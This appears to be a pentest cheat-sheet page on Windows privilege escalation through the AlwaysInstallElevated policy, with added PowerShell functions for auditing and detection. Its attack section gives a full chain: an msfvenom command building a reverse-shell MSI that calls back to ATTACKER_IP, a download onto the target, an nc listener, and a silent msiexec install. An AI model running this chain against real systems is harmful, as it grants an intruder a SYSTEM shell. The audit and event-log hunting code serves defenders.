PRIMARY CATEGORY → WINDOWS PRIVESC
RESOURCES | LINK
---|---
Hacktricks | See here
Windows Privesc - AlwaysInstallElevated | See here
Leveraging AlwaysInstallElevated for Windows PE | See here
AlwaysInstallElevated
AlwaysInstallElevated is a Windows Installer policy that allows a non-privileged user to install (and therefore execute) any MSI package as NT AUTHORITY\SYSTEM on the system where it is enabled.
This option is intended for corporate environments where System Administrators need to let users run certain installation packages with elevated privileges even though the users themselves do not have them.
The feature is controlled by two registry values, one per hive; the policy is only effective when both are set →
HKCU\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
HKLM\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
Check for Enabled Registry Keys
Check whether both values exist and are enabled; if either one is missing or set to 0, the policy is not in effect
Enabled → 1 (shown as 0x1 by reg query)
Reg Query
CMD & PS
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Get-ItemProperty
PS
Get-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated
Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated
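The two Get-ItemProperty calls above only print the raw values. The following PowerShell function is an added example (not part of the original page) that reads both hives, treats a missing key or value as "not enabled", reports whether the policy is actually in effect (both hives set to 1), and, with the -Remediate switch, resets both values to 0. The -Remediate switch assumes an elevated session, since writing the HKLM value requires administrative rights.

```powershell
# Added example (not from the original page): audit the AlwaysInstallElevated
# policy in both hives and optionally disable it.
function Test-AlwaysInstallElevated {
    [CmdletBinding()]
    param(
        # Set both values to 0 when the policy is found enabled (needs admin rights for HKLM)
        [switch]$Remediate
    )

    $paths = @(
        'HKCU:\Software\Policies\Microsoft\Windows\Installer',
        'HKLM:\Software\Policies\Microsoft\Windows\Installer'
    )

    $results = foreach ($path in $paths) {
        $value = $null
        if (Test-Path -Path $path) {
            # A missing value name is the normal (secure) state, not an error
            $value = (Get-ItemProperty -Path $path -Name AlwaysInstallElevated `
                          -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        [pscustomobject]@{
            Hive    = $path.Split(':')[0]   # HKCU or HKLM
            Value   = $value                # $null when key or value is absent
            Enabled = ($value -eq 1)
        }
    }

    # The policy is only effective when BOTH hives are set to 1
    $exposed = @($results | Where-Object Enabled).Count -eq 2

    if ($exposed -and $Remediate) {
        foreach ($path in $paths) {
            Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }

    [pscustomobject]@{
        Details = $results
        Exposed = $exposed
    }
}

# Usage: audit only
Test-AlwaysInstallElevated | Format-List

# Usage: audit and disable from an elevated prompt
# Test-AlwaysInstallElevated -Remediate
```

Setting the values to 0 is the quickest local fix; in a domain the authoritative setting lives in Group Policy (Computer Configuration and User Configuration → Administrative Templates → Windows Components → Windows Installer → "Always install with elevated privileges"), so a local change will be overwritten at the next policy refresh unless the GPO itself is corrected.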
Privesc using a Malicious .MSI File
Crafting the Payload
MSFVenom
Once we verify that both registry values above are enabled, we can craft a malicious .MSI file using msfvenom as follows
msfvenom --payload windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> --platform windows --arch x64 --format msi --out <OUTPUT_FILE>.msi
File Transfer
From the Attacker
python3 -m http.server <PORT>
From the Target
(New-Object Net.WebClient).DownloadFile('http[s]://<ATTACKER_IP>:<PORT>/malicious.msi', 'C:\ProgramData\malicious.msi')
Payload Execution
From the Attacker
rlwrap -CaR nc -nlvp <PORT>
From the Target
msiexec /quiet /qn /i C:\ProgramData\malicious.msi
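On the defensive side, every package run through msiexec leaves a trace in the Application event log under the MsiInstaller provider. The following PowerShell function is an added example (not part of the original page) that pulls event 1040 ("Beginning a Windows Installer transaction: <path>. Client Process Id: <pid>.") for the last few days and flags packages that were launched from user-writable locations such as C:\ProgramData, the directory used in the execution step above. The list of suspicious roots and the exact wording of the event message are assumptions for this example and should be checked against your own systems.

```powershell
# Added example (not from the original page): hunt for Windows Installer
# transactions started from user-writable directories.
function Get-SuspiciousMsiInstall {
    [CmdletBinding()]
    param(
        [int]$Days = 7,
        # Directories a standard user can write to (assumed list, adjust as needed)
        [string[]]$SuspiciousRoots = @(
            'C:\ProgramData',
            'C:\Users',
            'C:\Windows\Temp',
            "$env:PUBLIC"
        )
    )

    # Event 1040 is logged when an install transaction begins; the message carries the package path.
    # -ErrorAction SilentlyContinue: Get-WinEvent throws when no events match the filter.
    $events = Get-WinEvent -FilterHashtable @{
        LogName      = 'Application'
        ProviderName = 'MsiInstaller'
        Id           = 1040
        StartTime    = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        # Assumed message format: "Beginning a Windows Installer transaction: C:\path\pkg.msi. Client Process Id: 1234."
        if ($e.Message -match 'transaction:\s+(?<path>.+?\.msi)') {
            $path = $Matches['path']
            $hit  = $SuspiciousRoots | Where-Object { $path -like "$_\*" }
            if ($hit) {
                [pscustomobject]@{
                    Time    = $e.TimeCreated
                    Package = $path
                    Root    = ($hit | Select-Object -First 1)
                    Message = $e.Message
                }
            }
        }
    }
}

# Usage: review the last 14 days, newest first
Get-SuspiciousMsiInstall -Days 14 | Sort-Object Time -Descending | Format-Table -AutoSize
```

Where process-creation auditing (Security event 4688 with command-line logging, or Sysmon event 1) is enabled, the same activity shows up as msiexec.exe started with /i and /quiet or /qn by a non-administrative user, which pairs well with this log check.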